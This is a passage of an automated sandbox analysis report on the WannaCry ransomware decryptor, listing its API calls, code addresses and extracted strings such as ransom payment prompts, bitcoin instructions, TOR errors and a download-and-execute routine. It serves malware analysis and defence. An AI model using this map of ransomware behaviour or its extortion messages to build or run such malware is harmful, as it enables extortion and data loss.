      • Part of subcall function 00402560: wcsrchr.MSVCRT ref: 0040258A
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025A5
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025B4
      • Part of subcall function 00402560: wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
    • #825.MFC42(?), ref: 00402A6B
    • #825.MFC42(?), ref: 00402ABF
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EC8
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EE6
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
    • sscanf.MSVCRT ref: 00403D26
    • fopen.MSVCRT ref: 00403D45
    • fread.MSVCRT ref: 00403D69
    • sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00401C30: #12.WS2_32(?), ref: 00401C3F
    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
    • #823.MFC42(00000088), ref: 00403DE4
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
    • fclose.MSVCRT ref: 00403E16
    • FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
    • FindClose.KERNEL32(?), ref: 00403E3B
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
    • sscanf.MSVCRT ref: 0040816A
    • fopen.MSVCRT ref: 00408185
    • fread.MSVCRT ref: 004081A0
    • fclose.MSVCRT ref: 004081BE
    • FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
    • FindClose.KERNEL32(?), ref: 00408200
    • sprintf.MSVCRT ref: 00408266
    • #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
    • wcslen.MSVCRT ref: 00407EF4
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
    • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    APIs
    • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
    • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
    • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
    • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
      • Part of subcall function 00406AE0: #540.MFC42(?,0001DAA0), ref: 00406B03
      • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
      • Part of subcall function 00406AE0: #800.MFC42(?,?,0001DAA0), ref: 00406B62
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
      • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
      • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,0001DAA0), ref: 00406BC4
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
    APIs
    • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    APIs
    • #940.MFC42(?), ref: 0040527D
    • #4277.MFC42(?,00000001), ref: 004052A0
    • #923.MFC42(?,00000000,?), ref: 004052B8
    • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
    • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
    • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
    • #4129.MFC42(?,?), ref: 004052FC
    • #5710.MFC42 ref: 00405314
    • #922.MFC42(?,00000000,00000000), ref: 00405326
    • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
    • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
    • #940.MFC42(?), ref: 00405396
    • #5710.MFC42(?,?), ref: 004053B8
    • #4129.MFC42(?,?,?,?), ref: 004053D7
    • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
    • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
    • #4129.MFC42(?,?), ref: 00405443
    • #4277.MFC42(?,?,?,?), ref: 0040545B
    • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
    • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
    • #6778.MFC42(?,00000001), ref: 004054EA
    • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
    • #6778.MFC42(00000000,?), ref: 00405536
    • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
    APIs
    • #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
    • #858.MFC42 ref: 00408322
    • #800.MFC42 ref: 00408332
    • #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
    • #800.MFC42 ref: 0040836B
    • time.MSVCRT ref: 0040837F
    • #540.MFC42 ref: 004083C8
    • time.MSVCRT ref: 004083D6
    • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
    • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
    • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
    • #800.MFC42 ref: 00408440
    • time.MSVCRT ref: 0040844E
    • fopen.MSVCRT ref: 00408487
    • #800.MFC42 ref: 004084A8
    • fread.MSVCRT ref: 004084C2
    • fclose.MSVCRT ref: 004084C9
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
    • time.MSVCRT ref: 00408528
    • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
    • #800.MFC42 ref: 0040855B
    Strings
    • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
    • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
    • 00000000.res, xrefs: 00408480
    • s.wnry, xrefs: 004084DD
    • Too short message!, xrefs: 0040834F
    • Your message has been sent successfully!, xrefs: 0040851D
    APIs
    • #470.MFC42 ref: 00408708
    • GetClientRect.USER32(?,?), ref: 0040871F
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
    • #6734.MFC42(?,?), ref: 00408746
    • #323.MFC42(?,?), ref: 0040874F
    • CreateCompatibleDC.GDI32(?), ref: 004087D2
    • #1640.MFC42(00000000), ref: 004087DD
      • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
      • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
    • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
    • FillRect.USER32(?,?,?), ref: 0040887D
    • #2754.MFC42(?,?), ref: 00408892
    • #2381.MFC42(?,?,?), ref: 0040889F
    • #3797.MFC42(?,?,?), ref: 004088C0
    • _ftol.MSVCRT ref: 00408951
    • _ftol.MSVCRT ref: 0040896F
    • FillRect.USER32(?,00000000,00000000), ref: 004089B0
    • FillRect.USER32(?,00000000,?), ref: 004089C2
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
    • #755.MFC42(?,?,?), ref: 00408B20
      • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
    • #5785.MFC42(?,00000000,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ACE
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ADE
      • Part of subcall function 00409E20: #2414.MFC42(?,\gA,?,00414238,000000FF,00408AFE,?,?,?), ref: 00409E4B
    • #640.MFC42(?,?,?), ref: 00408B09
    APIs
    • #6453.MFC42 ref: 00401780
    • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
    • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
    • CloseHandle.KERNEL32(?), ref: 004017B2
    • sprintf.MSVCRT ref: 00401811
    • fopen.MSVCRT ref: 00401821
    • fread.MSVCRT ref: 00401844
    • fclose.MSVCRT ref: 0040184D
    • DeleteFileA.KERNEL32(?), ref: 0040185B
    • #537.MFC42(You have a new message:), ref: 00401885
    • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
    • #1200.MFC42 ref: 004018AF
    • #800.MFC42 ref: 004018BF
    • #800.MFC42 ref: 004018D3
    • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
    • rand.MSVCRT ref: 00401903
    • #1200.MFC42(Congratulations! Your payment has been checked!Start decrypting now!,00000040,00000000), ref: 00401939
    Strings
    • %08X.dky, xrefs: 0040180A
    • You have a new message:, xrefs: 00401877
    • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
    • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
    • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
    APIs
    • sprintf.MSVCRT ref: 00401323
    • sprintf.MSVCRT ref: 00401339
    • GetFileAttributesA.KERNEL32(?), ref: 00401343
    • DeleteFileA.KERNEL32(?), ref: 0040139A
    • fopen.MSVCRT ref: 004013D5
    • fread.MSVCRT ref: 00401405
    • fclose.MSVCRT ref: 00401408
    • sprintf.MSVCRT ref: 00401440
    • fopen.MSVCRT ref: 00401453
    • fread.MSVCRT ref: 00401481
    • fclose.MSVCRT ref: 00401484
    • sprintf.MSVCRT ref: 004014C1
    • fopen.MSVCRT ref: 004014D4
    • fread.MSVCRT ref: 00401502
    • fclose.MSVCRT ref: 00401507
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
      • Part of subcall function 0040C240: fopen.MSVCRT ref: 0040C46B
      • Part of subcall function 0040C240: fwrite.MSVCRT ref: 0040C489
      • Part of subcall function 0040C240: fclose.MSVCRT ref: 0040C48F
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
      • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
      • Part of subcall function 004047C0: strncmp.MSVCRT(00000000,?), ref: 00404951
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 00404964
      • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
    APIs
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
    • OpenClipboard.USER32(?), ref: 004035E9
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
    • #3301.MFC42(?,00000000,00000000), ref: 0040361A
    • #924.MFC42 ref: 00403635
    • #800.MFC42 ref: 00403646
    • #800.MFC42 ref: 00403665
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
    • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
    • GlobalLock.KERNEL32(00000000), ref: 0040369C
    • GlobalFree.KERNEL32(00000000), ref: 004036AB
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
    • #3301.MFC42(?,00000000,00000000), ref: 004036E7
    • #924.MFC42(00000000), ref: 00403702
    • #800.MFC42(00000000), ref: 00403713
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
    • wcslen.MSVCRT ref: 00403753
    • wcslen.MSVCRT ref: 0040377B
    • #800.MFC42 ref: 00403797
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
    • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
    • EmptyClipboard.USER32 ref: 004037D4
    • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
    • CloseClipboard.USER32 ref: 004037E3
    APIs
    • time.MSVCRT ref: 004076DA
    • sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
    • #540.MFC42 ref: 00407876
    • _ftol.MSVCRT ref: 004078AA
    • #2818.MFC42(?,$%d,00000000), ref: 004078BE
    • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
    • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
    • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
    • #3092.MFC42(00000402,?), ref: 0040791D
    • #6199.MFC42(00000402,?), ref: 00407924
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
    • #800.MFC42 ref: 0040799F
    APIs
    • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
    • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
    • #567.MFC42(00000066,00000000), ref: 0040612F
    • #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
      • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
      • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
      • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
      • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
      • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
      • Part of subcall function 004085C0: SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
      • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
      • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
      • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
      • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
      • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
      • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
      • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
    • #567.MFC42(00000066,00000000), ref: 004061DF
    • #540.MFC42(00000066,00000000), ref: 004061F7
    • #540.MFC42(00000066,00000000), ref: 00406209
    • #540.MFC42(00000066,00000000), ref: 00406219
    • #540.MFC42(00000066,00000000), ref: 00406229
    • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
    • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
    • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
    • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
    • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
    • LoadIconA.USER32(00000000,00000080), ref: 0040632F
    • #860.MFC42(00421798), ref: 00406358
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
    • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
    • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
    • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
    • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
    APIs
    • #4710.MFC42 ref: 004032C5
    • CreateSolidBrush.GDI32(?), ref: 004032DC
    • #1641.MFC42(00000000), ref: 004032E9
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
    • #1641.MFC42(00000000), ref: 0040331F
    • #3092.MFC42(00000408,00000000), ref: 0040332B
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
    • #3092.MFC42(00000409), ref: 00403353
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
    • #3092.MFC42(00000002), ref: 00403372
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
    • #3092.MFC42(0000040E), ref: 00403394
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
      • Part of subcall function 00403CB0: FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
      • Part of subcall function 00403CB0: sscanf.MSVCRT ref: 00403D26
      • Part of subcall function 00403CB0: fopen.MSVCRT ref: 00403D45
      • Part of subcall function 00403CB0: fread.MSVCRT ref: 00403D69
      • Part of subcall function 00403CB0: sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
      • Part of subcall function 00403CB0: #823.MFC42(00000088), ref: 00403DE4
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
      • Part of subcall function 00403CB0: fclose.MSVCRT ref: 00403E16
      • Part of subcall function 00403CB0: FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
      • Part of subcall function 00403CB0: FindClose.KERNEL32(?), ref: 00403E3B
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
    • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
    • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
    APIs
    • #540.MFC42(?,0001DAA0), ref: 00406B03
    • #3874.MFC42 ref: 00406B1B
    • #537.MFC42(msg\), ref: 00406B29
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
    • sprintf.MSVCRT ref: 00406B59
    • #800.MFC42(?,?,0001DAA0), ref: 00406B62
    • #800.MFC42 ref: 00406B73
    • GetFileAttributesA.KERNEL32(?), ref: 00406B7D
    • #537.MFC42(msg\), ref: 00406B91
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
    • sprintf.MSVCRT ref: 00406BBB
    • #800.MFC42(?,?,?,?,?,0001DAA0), ref: 00406BC4
    • #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406CF0: SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
      • Part of subcall function 00406CF0: #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,0001DAA0), ref: 00406D39
      • Part of subcall function 00406CF0: SendMessageA.USER32 ref: 00406D69
      • Part of subcall function 00406CF0: #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406CF0: #665.MFC42 ref: 00406D87
    • #800.MFC42(?), ref: 00406BF5
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • sprintf.MSVCRT ref: 0040B87A
    • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
    • sprintf.MSVCRT ref: 0040B924
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
      • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000428), ref: 0040B793
      • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
      • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
      • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
    • CreateProcessA.KERNEL32(00000000,?), ref: 0040B9AA
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 0040B9CF
    • WaitForSingleObject.KERNEL32(?,00007530), ref: 0040B9E2
    • CloseHandle.KERNEL32(?), ref: 0040B9EF
    • CloseHandle.KERNEL32(?), ref: 0040B9F6
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
